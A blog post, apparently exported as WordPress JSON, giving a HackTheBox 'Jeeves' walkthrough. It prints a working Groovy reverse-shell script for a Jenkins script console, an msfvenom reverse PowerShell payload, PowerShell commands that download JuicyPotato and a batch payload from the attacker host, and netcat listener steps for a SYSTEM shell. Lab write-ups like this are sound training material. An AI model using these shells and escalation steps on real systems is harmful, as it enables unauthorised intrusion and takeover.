{"id":605,"date":"2020-09-15T17:26:19","date_gmt":"2020-09-15T16:26:19","guid":{"rendered":"http:\/\/vroamam.com\/wordpress\/?p=605"},"modified":"2020-10-17T11:53:13","modified_gmt":"2020-10-17T10:53:13","slug":"jeeves-htb-write-up","status":"publish","type":"post","link":"https:\/\/vroamam.com\/wordpress\/blog\/jeeves-htb-write-up\/","title":{"rendered":"Jeeves – HTB Writeup"},"content":{"rendered":"\n

Enumeration<\/h2>\n\n\n\n

I ran a typical opening Nmap scan <\/p>\n\n\n\n

nmap -sS -sC -sV -O -p- -vv 10.10.10.63 -oA ~\/HTB\/Jeeves\/Jeeves<\/code><\/pre>\n\n\n\n
The Nmap scan shows the following ports open, I’ve emboldened what I thought was interesting<\/p>\n\n\n\n
PORT      STATE SERVICE    REASON          VERSION \n80\/tcp<\/strong>    open  http       syn-ack ttl 127 Microsoft IIS httpd 10.0 \n| http-methods:  \n|   Supported Methods: OPTIONS TRACE GET HEAD POST \n|_  Potentially risky methods: TRACE \n|http-server-header: Microsoft-IIS\/10.0<\/strong> <\/em>\n|_http-title: Ask Jeeves <\/em>\n135\/tcp<\/strong>   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC 445\/tcp<\/strong>   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000\/tcp open  http         syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT <\/em>\n|<\/em>http-server-header: Jetty(9.4.z-SNAPSHOT)<\/strong> |_http-title: Error 404 Not Found<\/pre>\n\n\n\n
So we have a website on port 80, some SMB and a non-iis web server on 50000 listed as – Jetty 9.4.z-SNAPSHOT<\/p>\n\n\n\n
Testing SMB<\/h4>\n\n\n\n
I ran smbclient and attempted to anonymously list shares, I got access denied<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Enumerating the Website(s)<\/h4>\n\n\n\n
Lets have a look at the website in more detail, it’s running the “ask jeeves” search engine:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
clicking the links goes nowhere and searching for the anything causes an error page ‘error.html’. Looking more closely this is an image of an IIS erorr rather than actual  errors.<\/p>\n\n\n\n
It suggests we are using SQL Server 2005 on Windows NT5.0 (Build  2195:Service Pack 4) and I note this “just in case”, but I was aware that Nmap indicated we were using IIS 10.0 so not likely to be of much use.<\/p>\n\n\n\n
Browsing to the  site on 50000 gave a 404 error<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The link on the page takes you to http:\/\/www.eclipse.org\/jetty\/<\/a><\/p>\n\n\n\n
Nikto  produced nothing of consequence.<\/p>\n\n\n\n
At this point I thought it was time to see if there were any hidden directories or files so I ran DirBuster<\/p>\n\n\n\n
Running DirBuster on http:\/\/10.10.10.63:50000<\/a> we find a folder called askjeeves<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
if we browse to http:\/\/10.10.10.63:50000\/askjeeves<\/a> we are presented with a menu we can add items, people, view the build history and manage the system.<\/p>\n\n\n\n
On the manage Jenkins page we see some options<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n\n\n\n
Initial Foothold<\/h2>\n\n\n\n
Possible Software Exploits<\/strong><\/h4>\n\n\n\n
From Rapid 7 – RCE<\/strong>
Certain versions of Jetty do not correctly sanitize backslash  characters in URL requests to the ‘\/cgi-bin’ directory. As a result, a  remote attacker can execute arbitrary binaries anywhere the web server  has access to.<\/p>\n\n\n\n
From Exploit-DB – Directory Traversal<\/strong>
source: https:\/\/www.securityfocus.com\/bid\/50723\/info<\/a><\/p>\n\n\n\n
Jetty Web Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.<\/p>\n\n\n\n
Exploiting this issue will allow an attacker to view arbitrary files  within the context of the webserver. Information harvested may aid in  launching further attacks.<\/p>\n\n\n\n
Example:
http:\/\/www.example.com:9084\/vci\/downloads\/<\/a>……………\\Documents and Settings\\All Users\\Application Data\\VMware\\VMware VirtualCenter\\SSL\\rui.key<\/p>\n\n\n\n
I tried a few times to run the metasploit module with no success and  tried to do some directory traversal with equally poor success. <\/p>\n\n\n\n
Website<\/strong>
Of particular interest is the Script Console (I highlighted this in the enumeration section above). If we can run scripts maybe we can abuse that and get a shell. <\/string><\/p>\n\n\n\n
Loading the script console we see this page<\/string><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It seems we can run scripts. I have no knowledge of groovy so I did a small search and found this site https:\/\/www.hackingarticles.in\/exploiting-jenkins-groovy-script-console-in-multiple-ways\/<\/a> which explains how to get a reverse shell but the code didn’t copy well.<\/p>\n\n\n\n
 A new search took me here https:\/\/gist.github.com\/frohoff\/fed1ffaab9b9beeb1c76<\/a> so I copied the code from here. I have pasted it below. This will produce a reverse shell in a netcat listener. Change “String Host” to your LHOST IP  address and the port to whatever port is useable on your attacking system<\/p>\n\n\n\n
String host=\"10.10.14.12\";\nint port=8044;\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();<\/code><\/pre>\n\n\n\n
Setup a netcat listener<\/p>\n\n\n\n
nc 10.10.14.12 8044<\/code><\/pre>\n\n\n\n

 Paste the code into the Jenkins console
 click run<\/p>\n\n\n\n
We have a shell. You can fetch the user flag from the user (kohsuke) desktop<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Using msfconsole<\/h4>\n\n\n\n
metasploit has a module for the jenkins console. I couldn’t get it to work.<\/p>\n\n\n\n
use exploit\/multi\/http\/jenkins_script_console<\/code><\/pre>\n\n\n\n
\n\n\n\n
Privilege Escalation<\/h2>\n\n\n\n
So we have a user shell. Looking at the user account we are a user named kohsuke<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
A normal user with no admin privileges, just a member of the normal users group<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We do however have the impersonate privilege.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And we can run sysinfo<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Sysinfo provides a way to look for privesc paths. We can take a copy of the output and paste to a file and use windows-exploit-suggester.py<\/a> to look at possible escalation paths<\/p>\n\n\n\n
I was doing a potato attack module in TCM Windows privilege escalation course<\/a> – it was a fair bet I was supposed to use the potato attack. I think though it is also reasonable to assume, if we have the impersonate privilege trying a potato attack makes sense.<\/p>\n\n\n\n
In this instance, I found a simple guide that used JuicyPotato here <\/a>and if you really want an in depth explanation on potato attacks, there is a really good post here <\/a><\/p>\n\n\n\n
I created the msfvenom<\/em> payload and the batch (bat) file then used a python webserver and Powershell to grab them both. Its worth noting that the link to the binaries in the README.md file is broken So I\u2019ve put a download link on this page.<\/p>\n\n\n\n
Download<\/a> the JuicyPotato executable<\/p>\n\n\n\n
Create a reverse shell using msfvenom<\/em>.<\/p>\n\n\n\n
msfvenom -p cmd\/windows\/reverse_powershell lhost=10.10.14.25 lport=4567 > shell.bat<\/code><\/pre>\n\n\n\n
Start the webserver on your attacking machine<\/p>\n\n\n\n
python -m SimpleHTTPServer 8000<\/code><\/pre>\n\n\n\n
In your target machine user shell, copy\/paste or type the Powershell commands below to fetch the files. Replace the IP address with your webserver IP.<\/p>\n\n\n\n
powershell -c \"wget http:\/\/10.10.14.25:8000\/JuicyPotato.exe -OutFile .\\JP.exe\"<\/code><\/pre>\n\n\n\n
powershell -c \"wget http:\/\/10.10.14.25:8000\/shell.bat -OutFile .\\shell.bat\"<\/code><\/pre>\n\n\n\n
start a netcat listener on your attacker machine. Change the port to the one you set in your msfvenom<\/em> payload<\/p>\n\n\n\n
nc -nvlp 4567<\/code><\/pre>\n\n\n\n
run the attack<\/p>\n\n\n\n
JP.exe -l 1234 -p shell.bat -t * <\/code><\/pre>\n\n\n\n
you should see the payload run in your shell window<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And your system shell should pop in netcat<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I was all excited at this point and headed straight to the Admin desktop to find there was no root.txt there was only an hm.txt – typing this out tells us we have to look deeper<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I tried to run a search using DIR<\/p>\n\n\n\n
cd c:\\\ndir root.txt \/S<\/code><\/pre>\n\n\n\n
and I also tried<\/p>\n\n\n\n
where \/R \\ root.txt<\/code><\/pre>\n\n\n\n
but neither found any files.<\/p>\n\n\n\n
I ran both again using root.* as the pattern, but all that was found  was an xml file. I had a look but it wasn’t the flag.<\/p>\n\n\n\n
I recalled a feature in windows called Alternate Data Stream. I didn’t know if I could search and recurse through datastreams, but a gut instinct told me it would be on the desktop where the noral root flag is so I decided to look there.<\/p>\n\n\n\n
cd \\user\\administrator\\desktop\ndir \/R *.*<\/code><\/pre>\n\n\n\n
the command dir \/R *.*<\/code> shows all data streams<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
As you can see there is an ADS. I tried to type that out<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Well that didn’t work so what can we do… I piped it to more, if you have a better idea drop it in the comments (please)<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
and that is Jeeves done.<\/p>\n","protected":false},"excerpt":{"rendered":"
Enumeration I ran a typical opening Nmap scan The Nmap scan shows the following ports open, I’ve emboldened what I thought was interesting PORT STATE SERVICE REASON VERSION 80\/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |http-server-header: Microsoft-IIS\/10.0 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[87,2,86,3],"tags":[88,6,85,91,95,96],"class_list":["post-605","post","type-post","status-publish","format-standard","hentry","category-ctf","category-cybersec","category-hackthebox","category-training","tag-ctf","tag-ethical-hacking","tag-hackthebox","tag-htb","tag-potato-attack","tag-windows-impersonate","entry"],"_links":{"self":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/comments?post=605"}],"version-history":[{"count":13,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605\/revisions"}],"predecessor-version":[{"id":637,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605\/revisions\/637"}],"wp:attachment":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/media?parent=605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/categories?post=605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/tags?post=605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}